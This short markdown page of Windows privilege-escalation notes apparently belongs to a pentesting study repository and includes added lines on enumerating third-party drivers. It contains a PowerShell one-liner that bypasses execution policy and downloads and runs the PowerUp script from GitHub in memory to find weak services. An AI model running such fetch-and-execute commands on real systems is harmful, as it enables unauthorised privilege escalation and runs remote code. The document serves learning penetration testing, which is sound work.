Shuvamoy/OSWindowsPrivEscalation/index.md

 If you have no powershell skip the first part of this section and go to the manual way if you do, you're in a bit of luck to automate this using PowerSploit > PrivEsc > PowerUp

 ## Spot the weak service using PowerSploit's PowerUP
 Usage and details of this script can be found [here](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)

     powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

+# Kernel-mode exploitation
+Identifying and exploiting vulnerabilities in kernel mode code (the kernel itself and device drivers).

+## Enumerating third-party drivers
+List of device drivers in the system, including vendor information:

+    driverquery /SI

 -----